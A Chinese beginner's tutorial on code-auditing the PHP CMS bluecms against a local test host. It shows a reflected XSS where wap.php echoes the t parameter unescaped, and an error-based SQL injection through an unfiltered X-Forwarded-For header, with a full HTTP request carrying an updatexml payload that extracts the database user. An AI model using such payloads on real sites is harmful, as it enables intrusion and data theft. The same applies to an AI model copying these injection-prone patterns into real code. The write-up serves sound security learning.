bluecms代码审计入门

bluecms是一个非常简单的cms适合入门学习php代码审计，这里直接用上seay进行自动审计在一个个验证

前台xss,出现在wap.php，通过request方式接受t参数并且直接输出

<?php
$t=$_REQUEST['t'];
//echo $t;
//exit;
?>
<script type="text/javascript">
//如果只跳转首页+启用动态浏览就把wap.php设置为第一个默认文档 如果启用静态浏览就把index.html设置为第一个默认文档 在index.html里加入跳转到手机站的判断代码
var mobileAgent = new Array("iphone", "ipod", "ipad", "android", "mobile", "blackberry", "webos", "incognito", "webmate", "bada", "nokia", "lg", "ucweb", "skyfire");
var browser = navigator.userAgent.toLowerCase();
var isMobile = false; 
for (var i=0; i<mobileAgent.length; i++)
{
     
if (browser.indexOf(mobileAgent[i])!=-1)
{
     
isMobile = true; 
//alert(mobileAgent[i]); 
location.href = 'm.php?t=<?php echo $_REQUEST['t'] ?>';
break; 
}
else
{
    
location.href = 'index.php?t=<?php echo $_REQUEST['t'] ?>';//首页模板不要加跳转到手机站的判断代码
}
} 
</script>

直接访问wap.php?t=就能直接触发

留言板报错注入这里因为没有对ip头进行过滤就拼接进sql语句中

	function add(){
    
		if($GLOBALS['G_DY']['vercode']==1){
    
		if(!$this->syArgs("vercode",1)||md5(strtolower($this->syArgs("vercode",1)))!=$_SESSION['doyo_verify'])message("验证码错误");
		}
		if(!$this->syArgs('tid'))message("请选择栏目");
		$tid=$this->syArgs('tid');
		$this->type=syDB('classtype')->find(array('tid'=>$tid),null,'molds,classname,msubmit');
		if($this->type['msubmit']!=1){
    
			$this->member->p_r($this->type['msubmit']);
		}
		$isshow = ($this->my['group']['audit']==1) ? 1 : 0;
		$user = ($this->my['id']!=0) ? $this->my['user'] : '游客';
		$fmolds = ($this->syArgs('fmolds',1)!='') ? $this->syArgs('fmolds',1) : '';
		$title = ($this->syArgs('title',1)!='') ? $this->syArgs('title',1) : $this->type['classname'];
		$body = ($this->syArgs('body',1)!='') ? $this->syArgs('body',1) : '';
		$row1 = array('tid' => $tid,'fmolds' => $fmolds,'faid' => $this->syArgs('faid'),'title' => $title,'addtime' => time(),'orders' => 0,'isshow' => $isshow,'user' => $user,'body' => $body,'reply'=>'');
		$row2=$this->fields_args('message',$tid);
		$add = syClass('c_message');
		$newv=$add->syVerifier($row1);
		echo $newv;
		if(false == $newv)
		{
    
			$a=$add->create($row1);$row2=array_merge($row2,array('aid' => $a));
			syDB('message_field')->create($row2);
			if($this->my['id']!=0){
    
				syDB('member_file')->update(array('hand'=>$this->syArgs('hand'),'uid'=>$this->my['id']),array('hand'=>0,'aid'=>$a,'molds' => 'message'));
			}else{
    
				syDB('member_file')->update(array('hand'=>$this->syArgs('hand'),'ip'=>GetIP()),array('hand'=>0,'aid'=>$a,'molds' => 'message'));

			}
			//message('发布成功',$GLOBALS["WWW"]);//bluecms 返回到了首页
			message('发布成功');//回到当前页面
		}
		else
		{
    
			message_err($newv);
		}

直接构造号数据包

POST /index.php?c=message&a=add&tid=23 HTTP/1.1
Host: www.blue.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Forwarded-For: 8.8.8.8' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))####
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://www.blue.com:8080
Connection: close
Referer: http://www.blue.com:8080/?c=message&a=type&tid=23
Cookie: PHPSESSID=1gobivh9getno63fuj0d67knn5
Upgrade-Insecure-Requests: 1

title=111&u_nianlin=111&download=111&hand=0006197981&body=1111

就到这里了这里的密码使用了两次md5加密，其实还有好多漏洞没有审计出来